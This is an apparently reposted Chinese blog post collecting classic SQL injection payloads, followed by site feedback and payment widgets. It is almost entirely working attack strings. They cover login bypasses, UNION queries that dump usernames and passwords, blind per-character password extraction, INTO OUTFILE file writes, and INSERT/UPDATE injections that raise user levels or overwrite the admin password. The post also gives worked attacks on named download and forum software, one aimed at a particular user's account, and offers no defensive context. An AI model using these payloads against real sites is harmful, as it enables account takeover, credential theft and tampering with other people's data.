经典的注入语句归总

注入经典语句总结 ' or 1=1 ' or '1=1 '/* '%23 ' and password='mypass id=-1 union select 1,1,1 id=-1 union select char(97),char(97),char(97) id=1 union select 1,1,1 from members id=1 union select 1,1,1 from admin id=1 union select 1,1,1 from user userid=1 and password=mypass userid=1 and mid(password,3,1)=char(112) userid=1 and mid(password,4,1)=char(97) and ord(mid(password,3,1))>111 (ord函数很好用,可以返回整形的) ' and LENGTH(password)='6(探测密码长度) ' and LEFT(password,1)='m ' and LEFT(password,2)='my …………………………依次类推 ' union select 1,username,password from user/* ' union select 1,username,password from user/* =' union select 1,username,password from user/* (可以是1或者=后直接跟) 99999' union select 1,username,password from user/* ' into outfile 'c:/file.txt (导出文件) =' or 1=1 into outfile 'c:/file.txt 1' union select 1,username,password from user into outfile 'c:/user.txt SELECT password FROM admins WHERE login='John' INTO DUMPFILE '/path/to/site/file.txt' id=' union select 1,username,password from user into outfile id=-1 union select 1,database(),version() (灵活应用查询) 常用查询测试语句, SELECT * FROM table WHERE 1=1 SELECT * FROM table WHERE 'uuu'='uuu' SELECT * FROM table WHERE 1<>2 SELECT * FROM table WHERE 3>2 SELECT * FROM table WHERE 2<3 SELECT * FROM table WHERE 1 SELECT * FROM table WHERE 1+1 SELECT * FROM table WHERE 1--1 SELECT * FROM table WHERE ISNULL(NULL) SELECT * FROM table WHERE ISNULL(COT(0)) SELECT * FROM table WHERE 1 IS NOT NULL SELECT * FROM table WHERE NULL IS NULL SELECT * FROM table WHERE 2 BETWEEN 1 AND 3 SELECT * FROM table WHERE 'b' BETWEEN 'a' AND 'c' SELECT * FROM table WHERE 2 IN (0,1,2) SELECT * FROM table WHERE CASE WHEN 1>0 THEN 1 END 例如:夜猫下载系统1.0版本 id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1 union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 (替换,寻找密码) union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49 (验证第一位密码) union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50 (第二位) union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1))=51 ………………………………………………………… 例如2:灰色轨迹 变换id进行测试(meteor) union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',pass(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2010)%20order%20by%20eventdate 构造语句: SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = 1 union (select 1,1,1,1,1,1,1 from user where userid=1) SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = 1 union (select 1,1,1,1,username,password from user where userid=1) UNION%20(SELECT%201,0,2,'1999-01-01','a',password%20FROM%20user%20WHERE%20userid%20=%205)%20order%20by%20eventdate UNION%20(SELECT%201,0,12695,'1999-01-01','a',password%20FROM%20user%20WHERE%20userid=13465)%20order%20by%20eventdate UNION%20(SELECT%201,0,12695,'1999-01-01','a',userid%20FROM%20user%20WHERE%20username='sandflee')%20order%20by%20eventdate (查沙子的id) (SELECT a FROM table_name WHERE a=10 AND B=1 ORDER BY a LIMIT 10) SELECT * FROM article WHERE articleid='$id' UNION SELECT * FROM……(字段和数据库相同情况下,可直接提交) SELECT * FROM article WHERE articleid='$id' UNION SELECT 1,1,1,1,1,1,1 FROM……(不同的情况下) 特殊技巧:在表单,搜索引擎等地方写: “___” “.__ ” “% %' ORDER BY articleid/* %' ORDER BY articleid# __' ORDER BY articleid/* __' ORDER BY articleid# $command = "dir c:";system($command); SELECT * FROM article WHERE articleid='$id' SELECT * FROM article WHERE articleid=$id 1' and 1=2 union select * from user where userid=1/* 句中变为 (SELECT * FROM article WHERE articleid='1' and 1=2 union select * from user where userid=1/*') 1 and 1=2 union select * from user where userid=1 语句形式:建立一个库,插入: CREATE DATABASE `injection` CREATE TABLE `user` ( `userid` int(11) NOT NULL auto_increment, `username` varchar(20) NOT NULL default '', `password` varchar(20) NOT NULL default '', PRIMARY KEY (`userid`) ) ; INSERT INTO `user` VALUES (1, 'swap', 'mypass'); 插如一个注册用户: INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1'); “INSERT INTO membres (login,password,nom,email,userlevel) VALUES ('$login','$pass','$nom','$email','1')"; INSERT INTO membres (login,password,nom,email,userlevel) VALUES ('','','','','3')#','1') "INSERT INTO membres SET login='$login',password='$pass',nom='$nom',email='$email'"; INSERT INTO membres SET login='',password='',nom='',userlevel='3',email='' "INSERT INTO membres VALUES ('$id','$login','$pass','$nom','$email','1')"; UPDATE user SET password='$password', homepage='$homepage' WHERE id='$id' UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id' "UPDATE membres SET password='$pass',nom='$nom',email='$email' WHERE id='$id'"; UPDATE membres SET password='[PASS]',nom='',userlevel='3',email=' ' WHERE id='[ID]' "UPDATE news SET Votes=Votes+1, score=score+$note WHERE idnews='$id'"; 长用函数: DATABASE() USER() SYSTEM_USER() SESSION_USER() CURRENT_USER() 比如: UPDATE article SET title=$title WHERE articleid=1 对应函数 UPDATE article SET title=DATABASE() WHERE id=1 #把当前数据库名更新到title字段 UPDATE article SET title=USER() WHERE id=1 #把当前 MySQL 用户名更新到title字段 UPDATE article SET title=SYSTEM_USER() WHERE id=1 #把当前 MySQL 用户名更新到title字段 UPDATE article SET title=SESSION_USER() WHERE id=1 #把当前 MySQL 用户名更新到title字段 UPDATE article SET title=CURRENT_USER() WHERE id=1 #把当前会话被验证匹配的用户名更新到title字段 ::::::::::::::::::::::::::::::: $req = "SELECT * FROM membres WHERE name LIKE '%$search%' ORDER BY name"; SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name SELECT uid FROM admins WHERE login='' OR 'a'='a' AND password='' OR 'a'='a' (经典) SELECT uid FROM admins WHERE login='' OR admin_level=1#' AND password='' SELECT * FROM table WHERE msg LIKE '%hop' SELECT uid FROM membres WHERE login='Bob' AND password LIKE 'a%'#' AND password='' SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name 本篇文章来源于 安防快线 (www.sec520.com) 原文出处:http://www.juntuan.net/Article/2009/200906/3544.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值